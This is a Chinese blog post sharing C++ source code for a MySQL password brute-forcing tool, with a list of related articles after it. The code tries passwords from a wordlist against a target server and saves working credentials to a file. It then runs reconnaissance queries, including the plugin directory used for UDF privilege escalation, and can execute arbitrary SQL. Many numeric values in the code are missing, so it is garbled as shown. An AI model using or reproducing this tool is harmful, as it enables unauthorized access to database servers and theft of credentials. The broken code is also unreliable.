#include "StdAfx.h"

#include "Sql.h"

#include <windows.h>

#include <stdio.h>

#include <mysql.h>

#pragma comment(linker,"/nodefaultlib:LIBCMT.lib")

#pragma comment(linker,"/nodefaultlib:MSVCRTD.lib")

#if defined _DEBUG

#pragma comment(lib, "mysqlclient_debug.lib")

#else

#pragma comment(lib, "mysqlclient.lib")

#endif

#pragma comment(lib, "wsock32.lib")

#pragma comment(lib, "Advapi32.lib") 

Sql::Sql(void)

{

}

Sql::~Sql(void)

{

}

void Sql::writefiles(char* buffer)

{

    FILE* fp = NULL;

    fp = fopen("succ.txt","a+");

    if (fp != NULL)

    {

        fwrite(buffer,strlen(buffer),,fp);

    }

    fclose(fp);

}

void Sql::Usage(char* help)

{

    printf("[-]:%s Usage:->192.168.1.1->root->crack\r\n",help);

    printf("[-]:%s Usage:->192.168.1.1->root->sql->passwordroot->select user()\r\n",help);

    //return;

    exit();

}

int Sql::crack_mysql(char* ServerHost,char* Username,char* password)

{

    MYSQL *conn;

    MYSQL_RES *res;

    MYSQL_ROW row;

    char plugs[];

    conn = mysql_init(NULL);

    char buffer[] = {};

    int count = ;

    char* Sql_exec[] = {"select version()","select user()","show databases","select @@plugin_dir"};

    if (!mysql_real_connect(conn,ServerHost,

        Username,password,"mysql",,NULL,CLIENT_MULTI_STATEMENTS))

    {

        printf("Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);

        mysql_close(conn);

    }else

    {

        memset(buffer,,sizeof(buffer));

        sprintf_s(buffer,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);

        printf(buffer);

        writefiles(buffer);

        if (mysql_select_db(conn,"mysql"))

        {

            printf("Select Errors the mysql database!\r\n");

        }

        for (int i =;i<;i++)

        {

            if (mysql_query(conn,Sql_exec[i]))

            {

                fprintf(stderr,"%s\r\n",mysql_error(conn));

                //exit(1);

            }

            res = mysql_use_result(conn);

            //res = mysql_store_result(conn);

            while ((row = mysql_fetch_row(res)) != NULL)

            {

                sprintf_s(plugs,"%s",row[]);

                printf("%s\r\n",plugs);

            }

        }

        mysql_free_result(res);

        mysql_close(conn);

    }

    return ;

}

int Sql::sql_exec(char* ServerHost,char* Username,char* password,char* sql)

{

    MYSQL *conn;

    MYSQL_RES *res;

    MYSQL_ROW row;

    char plugs[];

    conn = mysql_init(NULL);

    int count = ;

    if (mysql_real_connect(conn,ServerHost,

        Username,password,"mysql",,NULL,CLIENT_MULTI_STATEMENTS))

    {

        fprintf(stderr,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);

        if (mysql_select_db(conn,"mysql"))

        {

            printf("Select Errors the mysql database!\r\n");

        }

        if (mysql_query(conn,sql))

        {

            fprintf(stderr,"%s\r\n",mysql_error(conn));

            //exit(1);

        }

        if (!(res = mysql_store_result(conn)))

        {

            return -;

        }

        while ((row = mysql_fetch_row(res)) != NULL)

        {

            ZeroMemory(plugs,sizeof(plugs));

            sprintf_s(plugs,"%s",row[]);

            printf("%s\r\n",plugs);

        }

        mysql_free_result(res);

        mysql_close(conn);

    }else

    {

        fprintf(stderr,"Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);

    }

    return ;

}

int main(int argc,char* argv[])

{

    char* ServerHost = argv[];

    char* Username = argv[];

    char* method = argv[];

    Sql* newsql = NULL;

    FILE* fp = NULL;

    char buffer[MAX_PATH] = {};

    if (argc < )

    {

        newsql->Usage(argv[]);

    }

    if (strstr(method,"crack"))

    {

        fp = fopen("pass.txt","rb");

        if (fp == NULL)

        {

            printf("Error:%d, pwd.txt not found\r\n",GetLastError());

            return ;

        }

        while (fgets(buffer,MAX_PATH,fp) != NULL)

        {

            if (buffer[strlen(buffer) - ] == '\r')

            {

                buffer[strlen(buffer) - ] = '\0';

            }

            if (buffer[strlen(buffer) - ] == '\n')

            {

                buffer[strlen(buffer) - ] = '\0';

            }

            newsql->crack_mysql(ServerHost,Username,buffer);

            memset(buffer,,sizeof(buffer));

        }

        fclose(fp);

    }else if (strstr(method,"sql"))

    {

        char* password = argv[];

        char* sql = argv[];

        newsql->sql_exec(ServerHost,Username,password,sql);

    }

    return ;

}

头文件

#pragma once

class Sql

{

public:

    Sql(void);

    ~Sql(void);

    void Usage(char*);

    int crack_mysql(char* ServerHost,char* Username,char* password);

    int sql_exec(char* ServerHost,char* Username,char* password,char* sql);

    void writefiles(char* buffer);

};

本来还想写一个UDF 导出提权的,懒得写了。有兴趣的人可以自己去写。

Mysql 利用小工具源码的更多相关文章

  1. Qt5.5.0使用mysql编写小软件源码讲解---顾客信息登记表

    Qt5.5.0使用mysql编写小软件源码讲解---顾客信息登记表 一个个人觉得比较简单小巧的软件. 下面就如何编写如何发布打包来介绍一下吧! 先下载mysql的库文件链接:http://files. ...

  2. 实例源码--Android小工具源码

      下载源码   技术要点: 1. Android控件布局的使用 2. Http通信 3. XML数据解析 4. 网络状态的监听 5. 源码带有非常详细的中文注释 ...... 详细介绍: 1. An ...

  3. 从微信小程序开发者工具源码看实现原理(四)- - 自适应布局

    从前面从微信小程序开发者工具源码看实现原理(一)- - 小程序架构设计可以知道,小程序大部分是通过web技术进行渲染的,也就是最终通过浏览器的dom tree + cssom来生成渲染树:既然最终是通 ...

  4. 从微信小程序开发者工具源码看实现原理(一)- - 小程序架构设计

    使用微信小程序开发已经很长时间了,对小程序开发已经相当熟练了:但是作为一名对技术有追求的前端开发,仅仅熟练掌握小程序的开发感觉还是不够的,我们应该更进一步的去理解其背后实现的原理以及对应的考量,这可能 ...

  5. 复用微信小程序源码包后仍然有原小程序的版本管理怎么处理

    前言: 复用微信小程序源码包后,重新创建项目导入源码包,会发现开发者工具版本管理中仍然有原来小程序的版本,这样就不太好了.毕竟是一个新的小程序,需要有新的版本控制的.那么这个问题怎么处理呢? 解决方案 ...

  6. MySQL的JDBC驱动源码解析

    原文:   MySQL的JDBC驱动源码解析 大家都知道JDBC是Java访问数据库的一套规范,具体访问数据库的细节有各个数据库厂商自己实现 Java数据库连接(JDBC)由一组用 Java 编程语言 ...

  7. MySQL Master High Available 源码篇

    https://m.aliyun.com/yunqi/users/1287368569594542/articles https://yq.aliyun.com/articles/59233 MySQ ...

  8. 反编译获取线上任何微信小程序源码(转)

    看到人家上线的小程序的效果,纯靠推测,部分效果在绞尽脑汁后能做出大致的实现,但是有些细节,费劲全力都没能做出来.很想一窥源码?查看究竟?看看大厂的前端大神们是如何规避了小程序的各种奇葩的坑?那么赶紧来 ...

  9. 【转】反编译获取任何微信小程序源码(完)

    一.前言最近在学习微信小程序开发,半个月学习下来,很想实战一下踩踩坑,于是就仿写了一个阿里妈妈淘宝客小程序的前端实现,过程一言难尽,差不多两周时间过去了,发现小程序的坑远比想象的要多的多!!在实际练手 ...

随机推荐

  1. IIPP迷你项目(一)“Rock-paper-scissor-lizard-Spock”

    0 前言——关于IIPP 本系列博客的内容均来自<An Introduction to Interactive Programming in Python (Part 1)>(在此我简称为 ...

  2. js 自学,云知梦知识 点理论

    一.第1章(1--4) 何为js特效 1.定义事件(触发时机+行为) 2.触发事件(行为发生) 3.事件发生是具有重复性   js是基本对象的语言. 面向对像编程 1.如何获得该对象 2.如何 调用该 ...

  3. CAP theorem

    https://en.wikipedia.org/wiki/CAP_theorem

  4. 类加载器(ClassLoader)

    1. 类加载器概述 1.1 类加载器的作用 把 .class 文件加载到 JVM 的方法区中,变成一个 Class 对象! 1.2 类加载器分类 类加载器也是一个类: ClassLoader; Jav ...

  5. 3.6.使用STC89C52控制MC20解析GPS的经纬度数据上传到指定服务器

    需要准备的硬件 MC20开发板 1个 https://item.taobao.com/item.htm?id=562661881042 GSM/GPRS天线 1根 https://item.taoba ...

  6. 剑指offer 面试20题

    面试20题: 题目:表示数值的字符串 题:请实现一个函数用来判断字符串是否表示数值(包括整数和小数).例如,字符串"+100","5e2","-123 ...

  7. java.lang.IllegalStateException: availableProcessors is already set to [4], rejecting [4]

    Links: 1.Getting availableProcessors is already set to [1], rejecting [1] IllegalStateException exce ...

  8. LeetCode:学生的出勤记录|【551】

    LeetCode:学生的出勤记录|[551] 题目描述 给定一个字符串来代表一个学生的出勤纪录,这个纪录仅包含以下三个字符: 'A' : Absent,缺勤 'L' : Late,迟到 'P' : P ...

  9. 41和为S的连续正数序列

    题目描述 小明很喜欢数学,有一天他在做数学作业时,要求计算出9~16的和,他马上就写出了正确答案是100.但是他并不满足于此,他在想究竟有多少种连续的正数序列的和为100(至少包括两个数).没多久,他 ...

  10. C++中引用编译过的C代码为什么要用“extern c”

    函数经过编译系统的翻译成汇编,函数名对应着汇编标号.  因为C编译函数名与得到的汇编代号基本一样,如:fun()=>_fun, main=>_main  但是C++中函数名与得到的汇编代号 ...